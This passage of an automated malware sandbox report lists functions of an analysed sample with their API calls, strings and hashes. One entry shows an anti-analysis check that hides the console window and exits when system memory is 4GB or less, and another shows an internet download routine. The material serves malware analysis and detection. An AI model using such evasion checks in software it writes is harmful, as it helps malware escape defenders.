Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: Internet$CloseHandleOpentask$FileRead
String ID: Mozilla/5.0
API String ID: 3826775226-2630049532
Opcode ID: 52fe06be985d272533941236a2c35e77278372a666e846f6590d6f40bc205b0d
Instruction ID: 5c3699afa7d5f2c1058252e7cf71abc724459b553622bb63fb34b403eedf4ac8
Opcode Fuzzy Hash: 52fe06be985d272533941236a2c35e77278372a666e846f6590d6f40bc205b0d
Instruction Fuzzy Hash: AA318D71900209EBDB24DFA4DD56FFEB774BB44700F108659B602772C1DB74AA41CB90

Function 00AA3510 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00AA3516
ShowWindow.USER32(?,00000000), ref: 00AA3525
GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00AA3536
Sleep.KERNELBASE(00000BB8), ref: 00AA3582
Sleep.KERNEL32(00000BB8), ref: 00AA3592

Strings

Memory is less than or equal to 4GB. Exiting..., xrefs: 00AA355E
@, xrefs: 00AA352B

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: SleepWindow$ConsoleGlobalMemoryShowStatus
String ID: @$Memory is less than or equal to 4GB. Exiting...
API String ID: 4178238871-156674193
Opcode ID: 2b709f48d8780ce6072a5e7db6b091b115ade50757011d4dd82fbf79c463058b
Instruction ID: 5abf4422f80d363c6ac29c3d62750aade612a0d0dd4dfbc4ea58a2bc0e362e3d
Opcode Fuzzy Hash: 2b709f48d8780ce6072a5e7db6b091b115ade50757011d4dd82fbf79c463058b
Instruction Fuzzy Hash: 27015E75D00308AFCF10EBE8D90AA5EBBB4BB45711F004459F902A32D0DBB856458F11

Function 00AB9EAC Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ea780f3ffc77e0d50879f4957d096b7d4760d9e4715785e93df8b13e28907a
Instruction ID: 84185b12422e82e6a02cd3a49a80723c63c333c9b9b37169cf45631ac88ab9dc
Opcode Fuzzy Hash: a0ea780f3ffc77e0d50879f4957d096b7d4760d9e4715785e93df8b13e28907a
Instruction Fuzzy Hash: 4AB12570E04209AFDB11DFACD840BFE7BB9BF5A310F544259E9019B293C7759942CB62

Function 00AA3F10 Relevance: 4.6, APIs: 3, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Min_value.LIBCPMTD ref: 00AA3F7D
__fread_nolock.LIBCMT ref: 00AA3FF8
__fread_nolock.LIBCMT ref: 00AA4048

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: __fread_nolock$Min_value
String ID:
API String ID: 3100174245-0
Opcode ID: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
Instruction ID: a041453e7d047b33a40cc8a0b00b1955874faff36da098a3b62bce9f8bf755ea
Opcode Fuzzy Hash: 3c3749919c9a63ec5bd6beb19ce55b8a7d9094cc88d032b5d89156b829ee7930
Instruction Fuzzy Hash: 3151FA75E00109EFDB08DFA8C994AAEBBB1FF89304F108169E915AB381D774AE45DB50

Function 00AB71B5 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AB68CB: GetConsoleOutputCP.KERNEL32(10830A53,00000000,00000000,?), ref: 00AB692E

WriteFile.KERNELBASE(?,00000000,00AB0FCF,?,00000000,00000000,00000000,?,00000000,?,00AA9774,00AB0FCF,00000000,00AA9774,?,?), ref: 00AB733A
GetLastError.KERNEL32(?,00AB0FCF,00000000,?,00AA9774,?,00000000,00000000), ref: 00AB7344

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 01673b37be38acd84840e79c967cd8d1e6f631cd289cf431189964d7ee16ac5a
Instruction ID: 9f06a02444400b0a5a6e737085f8116de00c85b4a8d72f6a484bccd09139be27
Opcode Fuzzy Hash: 01673b37be38acd84840e79c967cd8d1e6f631cd289cf431189964d7ee16ac5a
Instruction Fuzzy Hash: C1618F71908219AEDF11CFA8C984AFEBBBDBF99304F140149F804AB253D7B5D901DBA0

Function 00AB6670 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AB66BC
GetFileType.KERNELBASE(00000000), ref: 00AB66CE

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: de0e2f478649defdd8aa14f0de7b4ad9f19832975d790298c5791e195ed6bc50
Instruction ID: 96a85e1a428a3323252512f90fe10e6c24916f2403ff707ac49f537dd850c666
Opcode Fuzzy Hash: de0e2f478649defdd8aa14f0de7b4ad9f19832975d790298c5791e195ed6bc50
Instruction Fuzzy Hash: 1311847110475146C7388F3D8C986A27B99B756334B38071AD4B7875F3DB3CD8C6A645

Function 00ABA35C Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00AD5818,00AA9774,00000002,00AA9774,00000000,?,?,?,00ABA466,00000000,?,00AA9774,00000002,00AD5818), ref: 00ABA398
GetLastError.KERNEL32(00AA9774,?,?,?,00ABA466,00000000,?,00AA9774,00000002,00AD5818,00000000,00AA9774,00000000,00AD5818,0000000C,00AB10A6), ref: 00ABA3A5

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 4684af125b338680bef13725302adca6fffc7719f6ded8e1111addef881ef974
Instruction ID: df234a53fceb16438622132b12d0e068a8bee779abdeb3341a9670f5b66b2528
Opcode Fuzzy Hash: 4684af125b338680bef13725302adca6fffc7719f6ded8e1111addef881ef974
Instruction Fuzzy Hash: B7012636600104AFCF05CF59DC05DEE3FAEEB90320B240208F8019B1A2EA71DD42CB90

Function 00AB73D1 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00ABFBF4,00AADDC1,00000000,00AADDC1,?,00ABFE95,00AADDC1,00000007,00AADDC1,?,00AC0389,00AADDC1,00AADDC1), ref: 00AB73E7
GetLastError.KERNEL32(00AADDC1,?,00ABFBF4,00AADDC1,00000000,00AADDC1,?,00ABFE95,00AADDC1,00000007,00AADDC1,?,00AC0389,00AADDC1,00AADDC1), ref: 00AB73F2

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 1700170cf4eb5376bccaa2fffceae8ac499b72c404596f84728ccb9beb2d9061
Instruction ID: c9b4730a841e37e1e90ace5c995c0e2fc50644dcae6582f4034c304f6c3cd975
Opcode Fuzzy Hash: 1700170cf4eb5376bccaa2fffceae8ac499b72c404596f84728ccb9beb2d9061
Instruction Fuzzy Hash: 44E0E6365042156BCB126FE4AC09FE93B6DAB44752F554015F508960A1DA748952C7D4

Function 00AB92B2 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec40945590330137b3e0935fc7948b7ba4707c1f209cae0cc5214b3ac7497143
Instruction ID: abe17a202326a96dec8d27960270f884f7d8b9b3ba75cc1d6264e150bdc09b25
Opcode Fuzzy Hash: ec40945590330137b3e0935fc7948b7ba4707c1f209cae0cc5214b3ac7497143
Instruction Fuzzy Hash: 4D51D070A00208AFDF14CF58C995AEABFB9EF49324F248159E9499B353D2319E42CB91

Function 00AA38B0 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA63F0: std::ios_base::clear.LIBCPMTD ref: 00AA6421

fpos.LIBCPMTD ref: 00AA395A

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: fposstd::ios_base::clear
String ID:
API String ID: 1508181384-0
Opcode ID: efeb063a0a442d5bc828191100a1bef24089dc98b37674bb650717c05bba217e
Instruction ID: c4ce29df7858a10d474b7eb85015e6dfc3654ee71fd39447bdbfee7801e89677
Opcode Fuzzy Hash: efeb063a0a442d5bc828191100a1bef24089dc98b37674bb650717c05bba217e
Instruction Fuzzy Hash: 7E310A75A006099FCB04DFA8C991BBEB7B1FF89710F148618E5256B3D1CB31A901CB90

Function 00AA4C10 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00AA4C4A

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 1fdc0ff546ed6d4a43ce210d05a236f496a8986dbfbfa37c721818c0176f127f
Instruction ID: f011f111ad283f2ee866e9569a6c2db67330aa75c5e37571213714069e99cb81
Opcode Fuzzy Hash: 1fdc0ff546ed6d4a43ce210d05a236f496a8986dbfbfa37c721818c0176f127f
Instruction Fuzzy Hash: 3B312DB4A0025ADFDB04DF98C991BAEB7B1FF89704F148658E5266B3D1C771AD00CB91

Function 00AA36E0 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00AA371A

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 4fc352afb30af3fbe4df4778520e41947261cb007d471fd884f6d99195c78e55
Instruction ID: 7e11ff963e36cbb7ef6b08f0a3a43c1c08f5d9d1f75fb570bcc0c5302bdbb9da
Opcode Fuzzy Hash: 4fc352afb30af3fbe4df4778520e41947261cb007d471fd884f6d99195c78e55
Instruction Fuzzy Hash: 2A312FB4A00219DFDB04DF98C991BAEB7B2FF45704F148658E4266B3D1C771AD00CB95

Function 00ABAD5F Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00ABAD99

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 118b2856f456e5d6b6cc8856fb396061f7f39ca8688248fdf86f7fc68fd873f9
Instruction ID: 9601493ab527dcd87a60e8a26859178b9a11987e32a12d685bb46c0e2b311cd7
Opcode Fuzzy Hash: 118b2856f456e5d6b6cc8856fb396061f7f39ca8688248fdf86f7fc68fd873f9
Instruction Fuzzy Hash: 8E111871A0410AAFCB05DF58E941EDA7BF9EF48304F054059F809AB252DA30E911CB65

Function 00AB794F Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00AA112E,00AAEB35,?,00AB6514,00000001,00000364,00000006,000000FF,00AAEB35,00AAEB35,?,00AADF2C,00AB125E,FF85FFFF), ref: 00AB7990

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 415dfeaed31b68e79718b4e5f4bc1a296fbd7f7c7504ef4515f31d5f24eb57cd
Instruction ID: bc0c64587c8644275c46d2bf907c6e23218d954f71145ac26af41dc8af52073e
Opcode Fuzzy Hash: 415dfeaed31b68e79718b4e5f4bc1a296fbd7f7c7504ef4515f31d5f24eb57cd
Instruction Fuzzy Hash: DAF089316096256AAB616B729D05FEF7B6DAFC2770B298112AC14E61D3CBB0D80186E0

Function 00AC3FF7 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,?,00AC43E7,?,?,00000000,?,00AC43E7,?,0000000C), ref: 00AC4014

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2b82fcb5755dc0f6b0508c84c8bf4b4aeea6c58ba23d54b3b5be99d3b94f2055
Instruction ID: 646d7a95388af57ff2a0db356f8c85dfc860b26a3171c754c68290a613bbaeb9
Opcode Fuzzy Hash: 2b82fcb5755dc0f6b0508c84c8bf4b4aeea6c58ba23d54b3b5be99d3b94f2055
Instruction Fuzzy Hash: 52D06C3200010DBBDF029F84DC06EDA3BAAFB48754F014040BA1856020C736E962AB90

Non-executed Functions

Function 00AC0C06 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
Part of subcall function 00AB62CF: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00AB6375

GetACP.KERNEL32(?,?,?,?,?,?,00AB40D9,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC0CC5
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AB40D9,?,?,?,00000055,?,-00000050,?,?), ref: 00AC0CFC
_wcschr.LIBVCRUNTIME ref: 00AC0D90
_wcschr.LIBVCRUNTIME ref: 00AC0D9E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC0E5F

Strings

utf8, xrefs: 00AC0DCE

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: c21dc77c5837c9e9460e10e22a3bef5283c00ca1b621f868910cc70832223229
Instruction ID: 4023d5e3728fa428261b8346b88db2616695d36856433e6648c40e22974f6347
Opcode Fuzzy Hash: c21dc77c5837c9e9460e10e22a3bef5283c00ca1b621f868910cc70832223229
Instruction Fuzzy Hash: 32711371A04206EBDB25ABB4CD42FFA73A8EF45700F12452EF546DB182FB74E9458760

Function 00AC2279 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00AC2490

Strings

1#QNAN, xrefs: 00AC238C
1#SNAN, xrefs: 00AC2385
1#INF, xrefs: 00AC23AF
1#IND, xrefs: 00AC237E

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fbb9c9988daa240ebbba92b5a42f1c17836a6279f799281cf4a78af813f180c3
Instruction ID: b6af375aa825975eb2273bbc1216c37b9fcb453514b5e5956994d9a7c71f735c
Opcode Fuzzy Hash: fbb9c9988daa240ebbba92b5a42f1c17836a6279f799281cf4a78af813f180c3
Instruction Fuzzy Hash: 74D20772E086298FDF65CF28CD44BEAB7B5EB44305F1541EAD40DA7240EB78AE858F41

Function 00AC139F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00AC16B1,00000002,00000000,?,?,?,00AC16B1,?,00000000), ref: 00AC1438
GetLocaleInfoW.KERNEL32(00000000,20001004,00AC16B1,00000002,00000000,?,?,?,00AC16B1,?,00000000), ref: 00AC1461
GetACP.KERNEL32(?,?,00AC16B1,?,00000000), ref: 00AC1476

Strings

OCP, xrefs: 00AC13F3
ACP, xrefs: 00AC13BD

Memory Dump Source

Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 36342e5619b132194b4c07318c1d365b3d2605bb1cd3a9e4a2e9c8d84ac258ed
Instruction ID: e687782c2ea48737527db8d62d275a59f53e179f6297ebbebc9bbab01ba16bf6
Opcode Fuzzy Hash: 36342e5619b132194b4c07318c1d365b3d2605bb1cd3a9e4a2e9c8d84ac258ed
Instruction Fuzzy Hash: BF2183B6700101A6DB38CF64CA01F9772B7AF56B58B57846CE94ADB202E732DD41C390

Function 00AC157B Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AB62CF: GetLastError.KERNEL32(00000000,?,00ABB8D5), ref: 00AB62D3
